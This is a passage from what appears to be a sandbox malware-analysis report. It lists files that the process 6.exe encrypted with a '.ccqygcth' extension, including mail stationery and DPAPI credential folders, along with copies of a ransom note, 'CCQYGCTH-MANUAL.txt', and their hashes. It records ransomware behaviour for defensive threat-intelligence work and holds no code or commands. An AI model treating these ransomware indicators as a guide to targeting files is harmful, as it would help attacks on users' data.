SHA256: a1b6d3731dd1499a446670cbad90fdc218ae0f1dc2586fdbf6b94a1eeac2a120
2804
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Sports.url
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Entertainment.url
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Money.url
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft Store.url.ccqygcth
binary
MD5: 2a2ac0f781072b2607e64fcfc579402e
SHA256: e76a599bd94c6ed0a0062280ce86a54bd2043272b24cc3292a1b0e20b7bce4f1
2804
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft At Home.url.ccqygcth
binary
MD5: d4f8c18f18a81ae4407943a7c6f5f3c6
SHA256: b99e9991af884fac6217bd7e30134791c37802344c8410efb3b5b436b1045425
2804
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft At Work.url.ccqygcth
binary
MD5: d3b1282d5be0502686d7509d89500feb
SHA256: b9d95c417e6ca2b443277a89c4df475869d162c7173fcb510009960ad16184b0
2804
6.exe
C:\Users\Administrator\Favorites\MSN Websites\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Autos.url.ccqygcth
binary
MD5: 8129b68870218088337c1c0e85c8e859
SHA256: 4a734c1734fb9ec4fb3aadd2dcd360528f01610fa28b5806d78d231fffd65fdc
2804
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft At Work.url
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft Store.url
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\Favorites\MSN Websites\MSN Autos.url
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\IE site on Microsoft.com.url.ccqygcth
binary
MD5: ff2f16747da65754714f84f6f7cfcb39
SHA256: ddf1feef8a9b36dca15c33d1cd4b62aaa6357b0c0c19294f9084466f64766a19
2804
6.exe
C:\Users\Administrator\Favorites\Links for United States\USA.gov.url.ccqygcth
binary
MD5: 1b52f6033d03c1800ae67091c44c7951
SHA256: 07f9547d602415144c2d37119881dd9c3eaedf2278c2a64539b37b66ff4f1452
2804
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\IE Add-on site.url.ccqygcth
binary
MD5: 0bde9d67b8c7672a549c4a9a00cc4eef
SHA256: b3487d84ecbd57ee0c571b437c22d2dcee60e0aab3bb6b4d3897866a7bd494d9
2804
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\Microsoft At Home.url
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\IE site on Microsoft.com.url
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\Favorites\Links for United States\USA.gov.url
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\Favorites\Microsoft Websites\IE Add-on site.url
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\Downloads\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\Favorites\Links for United States\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\Favorites\Links\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\Favorites\Links for United States\GobiernoUSA.gov.url.ccqygcth
binary
MD5: a9f85b51eae3b51095ae33f5a1260128
SHA256: f6f0f66646cd131769d5faca02f89cdb05ddb4ecf389642c3222a8042cfb2179
2804
6.exe
C:\Users\Administrator\Favorites\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\Favorites\Links\Web Slice Gallery.url.ccqygcth
binary
MD5: 2509ceb11da1a2b83ef6f07ebb684cbd
SHA256: a02b011ac47b57d1b94e8ea2808a37b89298b901381e590f13168a7b8eff0003
2804
6.exe
C:\Users\Administrator\Videos\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\Favorites\Links\Web Slice Gallery.url
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\Favorites\Links for United States\GobiernoUSA.gov.url
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\Contacts\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\Documents\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\Desktop\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\Preferred.ccqygcth
binary
MD5: adcd0c4a64606bf0387172381305bacb
SHA256: c00f807136aa3138859caf2f297dd3e8cf57fb121a2b99e1723491230c5a4462
2804
6.exe
C:\Users\Administrator\Contacts\Administrator.contact.ccqygcth
binary
MD5: fae0beee10c53def5d892c9b86e17404
SHA256: 809e183b3521b00f58ad998310181b05052a129bb23856af06efc0bb1b810c6a
2804
6.exe
C:\Users\Administrator\Pictures\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\Music\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\Contacts\Administrator.contact
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\Preferred
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\e772058d-056e-4021-b783-db194666b156.ccqygcth
binary
MD5: 2420bda7fae1cafccbc1f8741512aeb1
SHA256: 105969d6f0cf4417e82a0d3346907e76798ddfbec92e189bc39c8bd37da16e3e
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\CREDHIST.ccqygcth
binary
MD5: 83b5e6fdbc6967b0b97b1a1f759d7ff3
SHA256: c53211e840a1be082ce82033f9d17150aab4d394076c1fe08b045be2c1b8615c
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\CREDHIST
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-500\e772058d-056e-4021-b783-db194666b156
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Identities\{BA2162A3-2F32-4850-8D8C-B3C9A2AA9D43}\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Media Center Programs\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Roaming\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Identities\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Credentials\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Sidebar\Settings.ini.ccqygcth
binary
MD5: c9cae2c3638883b0c561f451f85de2af
SHA256: cb59524e67992ea5f9904fa6f14a9a518339ab8ce351e864929d1e1cd7980e24
2804
6.exe
C:\Users\Administrator\AppData\LocalLow\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Temp\Low\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Temp\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Temp\Administrator.bmp.ccqygcth
binary
MD5: cf8e63483920831c419c0bdc35925f98
SHA256: 79523dcef48b17ca9f7e03a3e1861f8ed0da59ce65906159764fe28c9833a208
2804
6.exe
C:\Users\Administrator\AppData\Local\Temp\WPDNSE\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Temp\wmsetup.log.ccqygcth
binary
MD5: 269b8de7d198d34e1aa11390212f6222
SHA256: 62817ae4810ac0a5fff5f9705ae940adacf6f828f8eb9ff27828c3867cafef13
2804
6.exe
C:\Users\Administrator\AppData\Local\Temp\wmsetup.log
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Temp\Administrator.bmp
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Sidebar\Settings.ini
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD.ccqygcth
binary
MD5: b856ac24bc77a3cb7f50d5a47fe1f3b2
SHA256: 96a5c558d1616eebacd086a1446b77a50e50a6808a1a25748d3a9ef2006f4618
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Sidebar\Gadgets\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.ccqygcth
binary
MD5: 5d1a5bf324002db1a9f233eddeeb555e
SHA256: 0cc20cf3aa91f31486a147ad6cdef6757b5a85c19116988b72bcb803ea1d5a48
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Sidebar\CCQYGCTH-MANUAL.txt
text
MD5: 75605fd6997e336e96b65251b6a48cab
SHA256: 3e53c55fe2fe20f3edc15a3413c7f0448483dd0a3d01be581800673bda873871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\WindowsMail.MSMessageStore.ccqygcth
binary
MD5: 21244d4843d85bfaafb8214d15238b8f
SHA256: 73c8a883d07f6321a019630cc4e5af9d9a0a231c99fd578610a0057b56467fd6
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\WindowsMail.pat.ccqygcth
binary
MD5: 8aeee834e61035423ead31b759cae31d
SHA256: be05378085737c78345be4d6fd0d69b37150f58d55e6d195cbf154530b83cca7
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\WindowsMail.MSMessageStore
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\WindowsMail.pat
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Wrinkled_Paper.gif.ccqygcth
binary
MD5: 3750dc0b8bfd866e9abc440866ed03c7
SHA256: 4572ce103a19d5af8676ed80cfad0fdb251c5c3a7067b6eab4096ab4a7935cd3
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Wrinkled_Paper.gif
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg.ccqygcth
binary
MD5: 1c6302c45b209e13f01adcb0b88cb24b
SHA256: 95152573992ccb34b209480683b9ad4fd4db55b8a5f89719fd7cfbd975ca2844
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\White_Chocolate.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\To_Do_List.emf.ccqygcth
binary
MD5: 50b79c362881208e1196b839a3827f82
SHA256: 56e9f75c429978f9a56477721ae14594117146cd28a149c1eda1380945bfb66c
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\To_Do_List.emf
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tiki.gif.ccqygcth
binary
MD5: f8e9682371e2e0a428a76e5f2d74ff3e
SHA256: e81616377cedaf958dfc2813e0e56eef8d81b03b690f96a3d7ebe3640469e328
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tiki.gif
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tanspecks.jpg.ccqygcth
binary
MD5: 9a08ef510fbd5d228d503f2f005a0d01
SHA256: 21a3c214f71269514f77c6ab2981d0e070b018f179c6e330e3c6438e1f356c32
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Tanspecks.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stucco.gif.ccqygcth
binary
MD5: 1c822dedecccc41f8d21f7bcaccba035
SHA256: 3a60bd4be3471423fecb16f289e9947da4ac64d95aa3b1eb2e208ee367a0cfaf
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stucco.gif
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.ccqygcth
binary
MD5: 482e6f78d61e34a9f0963dfb8135b961
SHA256: e647681e46e6eb9b76e63e42ced0066f59405f927cc3c1ac9b2210ea81ef519f
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.htm.ccqygcth
binary
MD5: 3b06489485fb6f769c9833fcbe5c38a6
SHA256: aa5f8e34c7e70b1e62f22245ea8645c8398daf9a26e68b7dd99067e2dfcd9fee
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.htm
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.ccqygcth
binary
MD5: 550ed0db246489a44c2f1b3b9a912d7d
SHA256: 65ef3a458e25e4a90ee2be769e34f0471cc9a01f47a4ba17db88670424469871
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Soft Blue.htm.ccqygcth
binary
MD5: d82e027f93378a6869c819f3eed476e4
SHA256: 1e7c5560435163f34668940875af3a45167b30d0870138eaae40e730675ceb56
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Soft Blue.htm
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Small_News.jpg.ccqygcth
binary
MD5: c6f9455e0e770e248c354718571c7089
SHA256: 7458d2a10729ef7a7117dc81c1a46238b97f2b7824f44338a387ea57346d4646
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Small_News.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Shorthand.emf.ccqygcth
binary
MD5: 42d12aa24ebc47595168c85648e51772
SHA256: f26a2520acb1377627ad4d2ce48835ed88d3924fb60de618372b7a4a4d143972
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Shorthand.emf
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.ccqygcth
binary
MD5: 7406bdee28e1e13835d9040620eaea2a
SHA256: c195af7ea3b3176a7711a471a495be872ed42482bb8df0b7481510854351be6a
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Shades of Blue.htm.ccqygcth
binary
MD5: ae812827153a2eecbe7706ea508a11ce
SHA256: 1fc1d210116cda3a722629aab9a93db9dfe6c428197949641b7487672917ea74
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Shades of Blue.htm
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Seyes.emf.ccqygcth
binary
MD5: 36a5d64ca6d2f18f35210a4e136d60b6
SHA256: c79a27ed8c5b1a5be7c4c982275a1247644ad637c57219105c9185a12746dc03
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Seyes.emf
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg.ccqygcth
flc
MD5: 5588e6776fadc8d66abf359bef1dc2ab
SHA256: ac0b134638ea4c2338fa64c3a91ca667bd720d837416ba4ba9c86e6f9866a437
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.ccqygcth
binary
MD5: 32d197f9a8e6ae80be5ddeabd1cb653b
SHA256: 205a68e46cb8216cd6a6a126edb87e8ed0bd265aee376ea51329aceee098fe46
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.htm.ccqygcth
binary
MD5: 7cf48133961436f55abd9768cbd07dfe
SHA256: 2f83586e04824fa2d333c0314847fce7f55113f00a7ce6dfe5000d4ea16652eb
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.htm
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Psychedelic.jpg.ccqygcth
binary
MD5: fbe217f8ba45c739b0cfdbc3632032c1
SHA256: 209ea2e2dc19164472a3b0ac8f6ee6743458db3fb98509676f3126961bd4957a
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Psychedelic.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg.ccqygcth
binary
MD5: 527097f1c005da47c783c4db0eff1060
SHA256: 35b89e33b2ce63ed122ec420407a0cb0c1b94e965b1f9f5d6166f5d399efa5e7
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg.ccqygcth
binary
MD5: 725c779da66f8771d265a9e20bebd58c
SHA256: 82e60e1320ff410baa66d2b21288376d214f30dedeb76054faa4fb68a91d2cd8
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.ccqygcth
binary
MD5: 7dc4d5c35acc4a202e6c55113d571bb8
SHA256: f188fd807511df6b32d6bd4a2fe977ab35fa508554c2a83044748ea136decf49
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.htm.ccqygcth
binary
MD5: 4ff52c5e7b20be1d801a6809ccaeeb0e
SHA256: 81269a38fde073aa970a2dd678afdc5fdf062a4ed98333be301be1d3b63bef82
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.htm
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.ccqygcth
binary
MD5: e9059578c04cf6b78354bca51499e9a9
SHA256: 34f33b78ff0448acc7d347dea8fe2ac7fdda2c270a2af9b09e8a301d59e85869
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Orange Circles.htm.ccqygcth
binary
MD5: 8069fbab2e4cd84b5d4fcb1abb6f8f74
SHA256: 1a1a5969a6312749ed484aafae686ca877147d8d3c0a315bddcfc83f1ed5ef0a
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Orange Circles.htm
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Notebook.jpg.ccqygcth
binary
MD5: 2ed295a042d708aa6ac9bf3b636fc17b
SHA256: 7211b458f3079a7d588e0c2a2bb23eaa3ef8e888e783d846c7e5c21a28643dfc
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Notebook.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Music.emf.ccqygcth
flc
MD5: 4684b835a7d431d6c5ce9005696e3814
SHA256: db9e37292bbbba02050a907ecd8fbfee69e6dc5afe4d24f342aaee0413ce84d1
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Music.emf
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Month_Calendar.emf.ccqygcth
binary
MD5: 0e2a69a0140f534f90f425945972567c
SHA256: 491fc56e18f44e996570685cafb3430b89c2650c249e590e3e30c76d8740c8bf
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Month_Calendar.emf
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg.ccqygcth
binary
MD5: a94c571d8b0032e896a3cf410280f389
SHA256: 9b4f6ee5fdd7901e96a51fbfb95878fdd87c32f680c43715519669ac26a9a3fc
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg
––
MD5:  ––
SHA256:  ––
2804
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Memo.emf.ccqygcth
binary
MD5: 09e8458e791f47bcecb90145997c3c72
SHA256: d20c3ea884cd992dee00afaaad50f16bc6c476634ec1a90ff80d163739857637
2804
6.exe
